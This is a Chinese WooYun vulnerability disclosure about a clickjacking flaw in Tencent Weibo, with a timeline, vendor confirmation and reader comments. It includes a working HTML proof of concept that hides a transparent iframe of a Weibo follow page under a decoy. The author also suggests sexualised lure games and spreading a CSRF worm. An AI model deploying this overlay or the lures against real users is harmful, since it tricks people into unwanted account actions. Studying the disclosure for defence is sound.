当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019683

漏洞标题:腾讯微博clickhijacking(不要被你的双眼欺骗)

相关厂商:腾讯

漏洞作者: 冷冷的夜

提交时间:2013-03-07 15:33

修复时间:2013-04-21 15:34

公开时间:2013-04-21 15:34

漏洞类型:CSRF

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-07: 细节已通知厂商并且等待厂商处理中
2013-03-11: 厂商已经确认,细节仅向厂商公开
2013-03-21: 细节向核心白帽子及相关领域专家公开
2013-03-31: 细节向普通白帽子公开
2013-04-10: 细节向实习白帽子公开
2013-04-21: 细节向公众公开

简要描述:

腾讯微博clickjacking

详细说明:

表面上她是这样

1-1.jpg


其实她是这样

2-1.jpg


点击了之后就是这样了

3.jpg


是在上次的owasp 2012上面看到的,今天试了下,结果还是可以的
当然,这只是一个收听的例子,还可以进行其他的操作。能干的事情还很多,就看你的思路了。比如你完全可以开发些小游戏,如“是男人就把她脱完”,“帮美女脱衣”等的小游戏来诱惑别人“帮你”点击。假设有一个腾讯微博的csrf worm,完全可以用这种方式使得用户既玩的开心,又能帮你传播这个csrf worm。总之,思想一定要猥琐。

漏洞证明:

<html>
<head>
<title>
腾讯微博clickjacking
</title>
<script>
function showHide_frame() {
var text_1 = document.getElementById("target");
text_1.style.opacity = this.checked ? "0.5": "0";
text_1.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + (this.checked ? "50": "0") + ");"
}
</script>
</head>
<body>
<div style="position:absolute;top:20px;left:300px;">
<font color=”#AA00DD″ size="22">腾讯微博 clickjacking attack </font>
</div>
<div style="position:absolute;color:#00ff00;top:184px;left:579px">
<div style="color:red">下一页</div>
<img src="2.jpg">
</div>
<div><iframe id="target" src="http://t.qq.com/lenglengdy/follower#mainWrapper" style="position:absolute;width:100%;height:500px;left:200px;filter:alpha(opacity=0.0);opacity:0.0;"></iframe></div>
</body>
<div style="position:absolute;top:440px;left:550px;">
<input id="showHide_frame" type="checkbox" onclick="showHide_frame.call(this);"/>
<label for="showHide_frame">
Show the jacked I--Frame
</label>
</div>
</html>


参照:
http://www.owasp.org.cn/OWASP_Conference/2012/downloading/07NeglectedUIRedressing.pdf
http://mall.aliapp.com/clickjacking2.html

修复方案:

deny sameorigin

版权声明:转载请注明来源 冷冷的夜@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-03-11 11:35

厂商回复:

非常感谢您的报告。我们会马上安排专人跟进确认处理,有新的情况会及时同步

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-07 15:57 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    视觉欺骗的例子蛮少,吊

  2. 2013-03-07 16:00 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    标题亮瞎眼了。。。

  3. 2013-03-07 17:00 | MEng ( 路人 | Rank:1 漏洞数:2 | 刚接触这个领域、来学习了)

    点击劫持还是CSRF?

  4. 2013-03-07 22:38 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    啥叫视觉劫持啊?头一次听说

  5. 2013-03-07 23:06 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    点击劫持?。。关注一下

  6. 2013-03-08 12:56 | 小蝎 ( 普通白帽子 | Rank:140 漏洞数:21 )

    就是点击劫持 和CSRF不同的是,这个漏洞更加注重与用户的交互性。比CSRF的杀伤力更厉害。

  7. 2013-03-08 13:38 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @小蝎 大多就是利用iframe做一个内嵌,然后诱导用户点击

  8. 2013-04-10 23:37 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    @苏南同学 看看《白帽子讲web安全》你就知道了

  9. 2013-04-11 12:21 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @Blackeagle 恩恩,知道了